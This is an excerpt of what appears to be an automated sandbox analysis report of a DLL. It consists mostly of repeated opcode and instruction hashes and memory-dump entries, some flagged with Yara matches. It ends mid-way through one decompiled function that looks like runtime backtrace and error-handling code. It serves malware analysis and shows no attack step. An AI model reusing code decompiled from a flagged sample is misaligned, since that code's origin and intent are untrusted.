                                                                                                                                                                                      • Instruction Fuzzy Hash: D031BC72A183119FC354DF29C48156AF7E0EF88314F814A2DF99A97250E7B4E909CF92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 04d6d5420f2ec85db073bfa76dfee4f205d8a2da72fe5bf215f3528ecaab6751
                                                                                                                                                                                      • Instruction ID: a9b58f0f192e7f125a4711a80368784a4fa364359a12303d88cf16b9e974a745
                                                                                                                                                                                      • Opcode Fuzzy Hash: 04d6d5420f2ec85db073bfa76dfee4f205d8a2da72fe5bf215f3528ecaab6751
                                                                                                                                                                                      • Instruction Fuzzy Hash: EB311272D0031AAFDB08CFE1D94A9EEBBB1FB40704F10816AD511BB290D7B95A55CF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: f1ff426e79746ad319983153294732274ee39d0f6843496e681fd78a0ea1dbe7
                                                                                                                                                                                      • Instruction ID: f20067412a8b648a6a7c84aa58334bb7198469887f20f928f72af254d81423ca
                                                                                                                                                                                      • Opcode Fuzzy Hash: f1ff426e79746ad319983153294732274ee39d0f6843496e681fd78a0ea1dbe7
                                                                                                                                                                                      • Instruction Fuzzy Hash: B231F8B290020CBFEB05DFA9D989CEEBBB9EB48318F018159F918A6250D3759E159F50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 41fb78f267175e101537b1da63eb1f95f6ffa96ed1ea6f3c6d98e9dded9ba910
                                                                                                                                                                                      • Instruction ID: 8636816756b55cae83fa7a57b57146b3d3a7d190e35efba16cfc9b73f612ac8d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 41fb78f267175e101537b1da63eb1f95f6ffa96ed1ea6f3c6d98e9dded9ba910
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8131D332900209BBDF059FA5CC068DEBFB6FF49310F108589FA2566160D3729A61DB50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 8ee398f73e3bd3737d3a0f46f012eb34d36fe675d243cd443379ab18b292edab
                                                                                                                                                                                      • Instruction ID: 619ca5f748422cf7face2fc5d15a7332cb59ff5f7a00ecdca67661e5acd4f834
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ee398f73e3bd3737d3a0f46f012eb34d36fe675d243cd443379ab18b292edab
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8831F1B1D0130EABCB48CFA5DA4A8EEBBB1EB44314F208199D511B6260D3B55B55CFA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 5f306290c89833e0bc14cfd63dcada7925a641137887b04603cec1842d07f268
                                                                                                                                                                                      • Instruction ID: 1dbbee74f4ac194eac0868424d5ed5274d36cd4405f7de39810c9b7e9bbf55f0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f306290c89833e0bc14cfd63dcada7925a641137887b04603cec1842d07f268
                                                                                                                                                                                      • Instruction Fuzzy Hash: BC214AB1D0020CBFDB15DFE5C88A8EEBFB9FF08358F108088E51466250D3BA9A559F91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 137f8063ab8a4e6c48daa6564079e0f37c3fb48828de76ab16e4e7a031f92ad0
                                                                                                                                                                                      • Instruction ID: 5630ab5262b1092eb83affaa0e8bcb6568a128f0dccbdb1e1c98c19be5b72ccb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 137f8063ab8a4e6c48daa6564079e0f37c3fb48828de76ab16e4e7a031f92ad0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B21C3B1D1030DEBDB18CFA5D54A5AEBBF1BF14718F208589E414AA284D7B85B18CF54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: aea94a607832564a84880f3c3b14b5cc51fe591e8ff82175b7d154a8c61f67c4
                                                                                                                                                                                      • Instruction ID: 2a9537da16d1372f950bcb638e64a28318d65f7ed4c848391fc36f24bbc4313a
                                                                                                                                                                                      • Opcode Fuzzy Hash: aea94a607832564a84880f3c3b14b5cc51fe591e8ff82175b7d154a8c61f67c4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 530169713112818FDB5ACF68C4A0B39B7FABF45699F5544A9D5528FB16DB30E840CE40
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 6eb6665ddb3350983e42d1cbc670fa1f7b7e34ee61cedf1b9ad9aa5777005a93
                                                                                                                                                                                      • Instruction ID: 0d3bdc26eba136541dd9cd30298e0b40537f2a27235db63b9d4c1b742e1d1ff0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6eb6665ddb3350983e42d1cbc670fa1f7b7e34ee61cedf1b9ad9aa5777005a93
                                                                                                                                                                                      • Instruction Fuzzy Hash: 96E08C32911278EBCB11CBC8CA00A8AB3ECEB89B00B510896F501E3200C270DF42CBD0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 8280ca142bc1b3d81a1ec9e0318d957c7d25c74bfd8627c95e038b2adada9f26
                                                                                                                                                                                      • Instruction ID: 74c1ef8a5dc4ca6ec7ffe53a0a0fe04981ba9dcfe9c923dd1801c4327973eb5e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8280ca142bc1b3d81a1ec9e0318d957c7d25c74bfd8627c95e038b2adada9f26
                                                                                                                                                                                      • Instruction Fuzzy Hash: AAC08C74001940C6CE0989D082703E4336CEBD6782F80088CC8028B642C62ED88BDF40
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                                      			E6E9DDD30(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, long _a8) {
                                                                                                                                                                                      				void* _v16;
                                                                                                                                                                                      				char _v1456;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				void _t191;
                                                                                                                                                                                      				void* _t194;
                                                                                                                                                                                      				long _t195;
                                                                                                                                                                                      				signed int _t200;
                                                                                                                                                                                      				void* _t201;
                                                                                                                                                                                      				void* _t204;
                                                                                                                                                                                      				void* _t205;
                                                                                                                                                                                      				long _t206;
                                                                                                                                                                                      				char _t208;
                                                                                                                                                                                      				void* _t217;
                                                                                                                                                                                      				void* _t218;
                                                                                                                                                                                      				void* _t221;
                                                                                                                                                                                      				void* _t227;
                                                                                                                                                                                      				void* _t229;
                                                                                                                                                                                      				void* _t233;
                                                                                                                                                                                      				void* _t235;
                                                                                                                                                                                      				void* _t241;
                                                                                                                                                                                      				void* _t243;
                                                                                                                                                                                      				void* _t244;
                                                                                                                                                                                      				void* _t246;
                                                                                                                                                                                      				void* _t250;
                                                                                                                                                                                      				void* _t252;
                                                                                                                                                                                      				long _t260;
                                                                                                                                                                                      				long _t262;
                                                                                                                                                                                      				void* _t263;
                                                                                                                                                                                      				void* _t264;
                                                                                                                                                                                      				char _t265;
                                                                                                                                                                                      				void* _t267;
                                                                                                                                                                                      				void* _t274;
                                                                                                                                                                                      				void* _t284;
                                                                                                                                                                                      				void* _t288;
                                                                                                                                                                                      				long _t291;
                                                                                                                                                                                      				WCHAR* _t293;
                                                                                                                                                                                      				void* _t294;
                                                                                                                                                                                      				WCHAR* _t304;
                                                                                                                                                                                      				long _t305;
                                                                                                                                                                                      				void* _t307;
                                                                                                                                                                                      				void* _t308;
                                                                                                                                                                                      				intOrPtr _t310;
                                                                                                                                                                                      				intOrPtr _t313;
                                                                                                                                                                                      				signed int _t315;
                                                                                                                                                                                      				intOrPtr _t317;
                                                                                                                                                                                      				void* _t318;
                                                                                                                                                                                      				void* _t322;
                                                                                                                                                                                      				void* _t324;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                      				_t317 = (_t315 & 0xfffffff0) - 0x5b0;
                                                                                                                                                                                      				_t310 = _t317;
                                                                                                                                                                                      				 *((intOrPtr*)(_t310 + 0x598)) = _t313;
                                                                                                                                                                                      				 *((intOrPtr*)(_t310 + 0x59c)) = _t317;
                                                                                                                                                                                      				 *(_t310 + 0x5a8) = 0xffffffff;
                                                                                                                                                                                      				 *((intOrPtr*)(_t310 + 0x5a4)) = E6E9E39E0;
                                                                                                                                                                                      				 *((intOrPtr*)(_t310 + 0x5a0)) =  *[fs:0x0];
                                                                                                                                                                                      				 *[fs:0x0] = _t310 + 0x5a0;
                                                                                                                                                                                      				_t191 =  *_a4;
                                                                                                                                                                                      				 *(_t310 + 0x28) = _t191;
                                                                                                                                                                                      				 *(_t310 + 0xe) = _t191;
                                                                                                                                                                                      				E6E9EE9D0(__edi, _t310 + 0x190, 0, 0x400);
                                                                                                                                                                                      				_t318 = _t317 + 0xc;
                                                                                                                                                                                      				_t194 =  *0x6ea1f8cc; // 0x2
                                                                                                                                                                                      				_t262 = 0x200;
                                                                                                                                                                                      				 *(_t310 + 0x24) = 0;
                                                                                                                                                                                      				 *(_t310 + 0x2c) = _t194;
                                                                                                                                                                                      				 *(_t310 + 0x30) = 0;
                                                                                                                                                                                      				 *(_t310 + 0x14) = _t194;
                                                                                                                                                                                      				 *(_t310 + 0x34) = 0;
                                                                                                                                                                                      				 *(_t310 + 0x10) = 0x200;
                                                                                                                                                                                      				if(0x200 >= 0x201) {
                                                                                                                                                                                      					L4:
                                                                                                                                                                                      					_t291 =  *(_t310 + 0x24);
                                                                                                                                                                                      					_t263 = _t262 - _t291;
                                                                                                                                                                                      					__eflags =  *(_t310 + 0x30) - _t291 - _t263;
                                                                                                                                                                                      					if( *(_t310 + 0x30) - _t291 < _t263) {
                                                                                                                                                                                      						 *(_t310 + 0x5a8) = 0;
                                                                                                                                                                                      						_t274 = _t310 + 0x2c;
                                                                                                                                                                                      						E6E9F9A30(_t274, _t291, _t263);
                                                                                                                                                                                      						_t318 = _t318 + 4;
                                                                                                                                                                                      						 *(_t310 + 0x14) =  *(_t310 + 0x2c);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t262 =  *(_t310 + 0x10);
                                                                                                                                                                                      					_t304 =  *(_t310 + 0x14);
                                                                                                                                                                                      					 *(_t310 + 0x34) = _t262;
                                                                                                                                                                                      					 *(_t310 + 0x24) = _t262;
                                                                                                                                                                                      					 *(_t310 + 0x20) = _t304;
                                                                                                                                                                                      					 *(_t310 + 0x1c) = _t262;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					L7:
                                                                                                                                                                                      					_t304 = _t310 + 0x190;
                                                                                                                                                                                      					 *(_t310 + 0x1c) = 0x200;
                                                                                                                                                                                      					 *(_t310 + 0x20) = _t304;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L8:
                                                                                                                                                                                      				SetLastError(0);
                                                                                                                                                                                      				_t195 = GetCurrentDirectoryW(_t262, _t304);
                                                                                                                                                                                      				_t305 = _t195;
                                                                                                                                                                                      				if(_t195 != 0 || GetLastError() == 0) {
                                                                                                                                                                                      					if(_t305 != _t262 || GetLastError() != 0x7a) {
                                                                                                                                                                                      						__eflags = _t305 -  *(_t310 + 0x10);
                                                                                                                                                                                      						_t262 = _t305;
                                                                                                                                                                                      						if(_t305 <  *(_t310 + 0x10)) {
                                                                                                                                                                                      							_t292 =  *(_t310 + 0x1c);
                                                                                                                                                                                      							 *(_t310 + 0x5a8) = 0;
                                                                                                                                                                                      							__eflags = _t305 -  *(_t310 + 0x1c);
                                                                                                                                                                                      							if(__eflags > 0) {
                                                                                                                                                                                      								E6E9F9470(_t262, _t305, _t292, _t305, _t310, __eflags, 0x6ea206e0);
                                                                                                                                                                                      								goto L70;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t293 =  *(_t310 + 0x20);
                                                                                                                                                                                      								_t274 = _t310 + 0x70;
                                                                                                                                                                                      								_push(_t305);
                                                                                                                                                                                      								E6E9E0D10(_t262, _t274, _t293, _t305, _t310);
                                                                                                                                                                                      								_t318 = _t318 + 4;
                                                                                                                                                                                      								asm("movsd xmm0, [esi+0x70]");
                                                                                                                                                                                      								_t264 = 0;
                                                                                                                                                                                      								 *(_t310 + 0x48) =  *(_t310 + 0x78);
                                                                                                                                                                                      								asm("movsd [esi+0x40], xmm0");
                                                                                                                                                                                      								_t200 =  *(_t310 + 0x30);
                                                                                                                                                                                      								__eflags = _t200;
                                                                                                                                                                                      								if(_t200 != 0) {
                                                                                                                                                                                      									goto L18;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L21;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							__eflags = _t262 - 0x201;
                                                                                                                                                                                      							 *(_t310 + 0x10) = _t262;
                                                                                                                                                                                      							if(_t262 < 0x201) {
                                                                                                                                                                                      								goto L7;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								goto L4;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t262 =  *(_t310 + 0x10) +  *(_t310 + 0x10);
                                                                                                                                                                                      						 *(_t310 + 0x10) = _t262;
                                                                                                                                                                                      						if(_t262 >= 0x201) {
                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L8;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t260 = GetLastError();
                                                                                                                                                                                      					_t264 = 1;
                                                                                                                                                                                      					 *(_t310 + 0x44) = _t260;
                                                                                                                                                                                      					 *(_t310 + 0x40) = 0;
                                                                                                                                                                                      					_t200 =  *(_t310 + 0x30);
                                                                                                                                                                                      					__eflags = _t200;
                                                                                                                                                                                      					if(_t200 != 0) {
                                                                                                                                                                                      						L18:
                                                                                                                                                                                      						__eflags =  *(_t310 + 0x14);
                                                                                                                                                                                      						if( *(_t310 + 0x14) != 0) {
                                                                                                                                                                                      							__eflags = _t200 & 0x7fffffff;
                                                                                                                                                                                      							if((_t200 & 0x7fffffff) != 0) {
                                                                                                                                                                                      								HeapFree( *0x6ea2e128, 0,  *(_t310 + 0x14));
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L21:
                                                                                                                                                                                      					__eflags = _t264;
                                                                                                                                                                                      					if(_t264 == 0) {
                                                                                                                                                                                      						_t201 =  *(_t310 + 0x40);
                                                                                                                                                                                      						_t274 =  *(_t310 + 0x44);
                                                                                                                                                                                      						_t293 =  *(_t310 + 0x48);
                                                                                                                                                                                      						_t265 =  *(_t310 + 0x28);
                                                                                                                                                                                      						 *(_t310 + 0x5a8) = 2;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						__eflags =  *(_t310 + 0x40) - 3;
                                                                                                                                                                                      						if( *(_t310 + 0x40) == 3) {
                                                                                                                                                                                      							_t288 =  *(_t310 + 0x44);
                                                                                                                                                                                      							 *(_t310 + 0x10) = _t288;
                                                                                                                                                                                      							 *(_t310 + 0x5a8) = 1;
                                                                                                                                                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t288 + 4))))( *_t288);
                                                                                                                                                                                      							_t318 = _t318 + 4;
                                                                                                                                                                                      							_t250 =  *(_t310 + 0x10);
                                                                                                                                                                                      							_t274 =  *(_t250 + 4);
                                                                                                                                                                                      							__eflags =  *(_t274 + 4);
                                                                                                                                                                                      							if( *(_t274 + 4) != 0) {
                                                                                                                                                                                      								_t252 =  *_t250;
                                                                                                                                                                                      								__eflags =  *((intOrPtr*)(_t274 + 8)) - 9;
                                                                                                                                                                                      								if( *((intOrPtr*)(_t274 + 8)) >= 9) {
                                                                                                                                                                                      									_t252 =  *(_t252 - 4);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								HeapFree( *0x6ea2e128, 0, _t252);
                                                                                                                                                                                      								_t250 =  *(_t310 + 0x44);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							HeapFree( *0x6ea2e128, 0, _t250);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t265 =  *(_t310 + 0xe);
                                                                                                                                                                                      						_t201 = 0;
                                                                                                                                                                                      						 *(_t310 + 0x5a8) = 2;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *((char*)(_t310 + 0x68)) = _t265;
                                                                                                                                                                                      					 *(_t310 + 0x5c) = _t201;
                                                                                                                                                                                      					 *(_t310 + 0x64) = _t293;
                                                                                                                                                                                      					 *(_t310 + 0x60) = _t274;
                                                                                                                                                                                      					 *(_t310 + 0x190) = 0x6ea1fdd8;
                                                                                                                                                                                      					 *(_t310 + 0x194) = 1;
                                                                                                                                                                                      					 *(_t310 + 0x198) = 0;
                                                                                                                                                                                      					 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6ea1f570;
                                                                                                                                                                                      					 *(_t310 + 0x1a4) = 0;
                                                                                                                                                                                      					_t294 =  *(_a8 + 0x1c);
                                                                                                                                                                                      					_push(_t310 + 0x190);
                                                                                                                                                                                      					_t204 = E6E9D2150( *((intOrPtr*)(_a8 + 0x18)), _t294);
                                                                                                                                                                                      					_t322 = _t318 + 4;
                                                                                                                                                                                      					__eflags = _t204;
                                                                                                                                                                                      					if(_t204 != 0) {
                                                                                                                                                                                      						L50:
                                                                                                                                                                                      						_t205 =  *(_t310 + 0x5c);
                                                                                                                                                                                      						__eflags = _t205;
                                                                                                                                                                                      						if(_t205 != 0) {
                                                                                                                                                                                      							__eflags =  *(_t310 + 0x60);
                                                                                                                                                                                      							if( *(_t310 + 0x60) != 0) {
                                                                                                                                                                                      								HeapFree( *0x6ea2e128, 0, _t205);
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t206 = 1;
                                                                                                                                                                                      						goto L54;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t208 =  *(_t310 + 0xe);
                                                                                                                                                                                      						 *(_t310 + 0x6c) = 0;
                                                                                                                                                                                      						 *((char*)(_t310 + 0xf)) = 0;
                                                                                                                                                                                      						 *(_t310 + 0x40) = _a8;
                                                                                                                                                                                      						 *(_t310 + 0x44) = 0;
                                                                                                                                                                                      						__eflags = _t208;
                                                                                                                                                                                      						 *((char*)(_t310 + 0x50)) = _t208;
                                                                                                                                                                                      						 *(_t310 + 0x2c) = _t310 + 0xe;
                                                                                                                                                                                      						 *(_t310 + 0x48) = _t310 + 0x5c;
                                                                                                                                                                                      						 *((intOrPtr*)(_t310 + 0x4c)) = 0x6ea1fde0;
                                                                                                                                                                                      						 *(_t310 + 0x1b) = _t208 != 0;
                                                                                                                                                                                      						 *(_t310 + 0x30) = _t310 + 0x6c;
                                                                                                                                                                                      						 *(_t310 + 0x34) = _t310 + 0x1b;
                                                                                                                                                                                      						 *((intOrPtr*)(_t310 + 0x38)) = _t310 + 0xf;
                                                                                                                                                                                      						 *((intOrPtr*)(_t310 + 0x3c)) = _t310 + 0x40;
                                                                                                                                                                                      						 *(_t310 + 0x10) = GetCurrentProcess();
                                                                                                                                                                                      						 *(_t310 + 0x24) = GetCurrentThread();
                                                                                                                                                                                      						_t307 = _t310 + 0x190;
                                                                                                                                                                                      						E6E9EE9D0(_t307, _t307, 0, 0x2d0);
                                                                                                                                                                                      						_t324 = _t322 + 0xc;
                                                                                                                                                                                      						_push(_t307);
                                                                                                                                                                                      						L6E9EC5AE();
                                                                                                                                                                                      						_t217 = E6E9DE4E0(_t265, _t307, _t310);
                                                                                                                                                                                      						__eflags = _t217;
                                                                                                                                                                                      						if(_t217 == 0) {
                                                                                                                                                                                      							_t308 =  *0x6ea2e148; // 0x0
                                                                                                                                                                                      							 *(_t310 + 0x58) = _t294;
                                                                                                                                                                                      							__eflags = _t308;
                                                                                                                                                                                      							if(_t308 == 0) {
                                                                                                                                                                                      								_t218 = GetProcAddress( *0x6ea2e130, "SymFunctionTableAccess64");
                                                                                                                                                                                      								__eflags = _t218;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									 *(_t310 + 0x5a8) = 3;
                                                                                                                                                                                      									E6E9F94E0(_t265, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ea20ad0);
                                                                                                                                                                                      									goto L70;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t308 = _t218;
                                                                                                                                                                                      									 *0x6ea2e148 = _t218;
                                                                                                                                                                                      									_t267 =  *0x6ea2e14c; // 0x0
                                                                                                                                                                                      									__eflags = _t267;
                                                                                                                                                                                      									if(_t267 != 0) {
                                                                                                                                                                                      										goto L41;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										goto L39;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t267 =  *0x6ea2e14c; // 0x0
                                                                                                                                                                                      								__eflags = _t267;
                                                                                                                                                                                      								if(_t267 != 0) {
                                                                                                                                                                                      									L41:
                                                                                                                                                                                      									 *(_t310 + 0x20) = GetCurrentProcess();
                                                                                                                                                                                      									_t221 =  *0x6ea2e158; // 0x0
                                                                                                                                                                                      									 *(_t310 + 0x1c) = _t308;
                                                                                                                                                                                      									 *(_t310 + 0x14) = _t267;
                                                                                                                                                                                      									__eflags = _t221;
                                                                                                                                                                                      									if(_t221 != 0) {
                                                                                                                                                                                      										L44:
                                                                                                                                                                                      										 *(_t310 + 0x28) = _t221;
                                                                                                                                                                                      										 *(_t310 + 0x74) = 0;
                                                                                                                                                                                      										 *(_t310 + 0x70) = 0;
                                                                                                                                                                                      										E6E9EE9D0(_t308, _t310 + 0x80, 0, 0x10c);
                                                                                                                                                                                      										_t324 = _t324 + 0xc;
                                                                                                                                                                                      										 *(_t310 + 0x7c) = 0;
                                                                                                                                                                                      										 *(_t310 + 0x78) =  *(_t310 + 0x248);
                                                                                                                                                                                      										 *(_t310 + 0x84) = 3;
                                                                                                                                                                                      										 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
                                                                                                                                                                                      										 *(_t310 + 0xac) = 0;
                                                                                                                                                                                      										 *(_t310 + 0xb4) = 3;
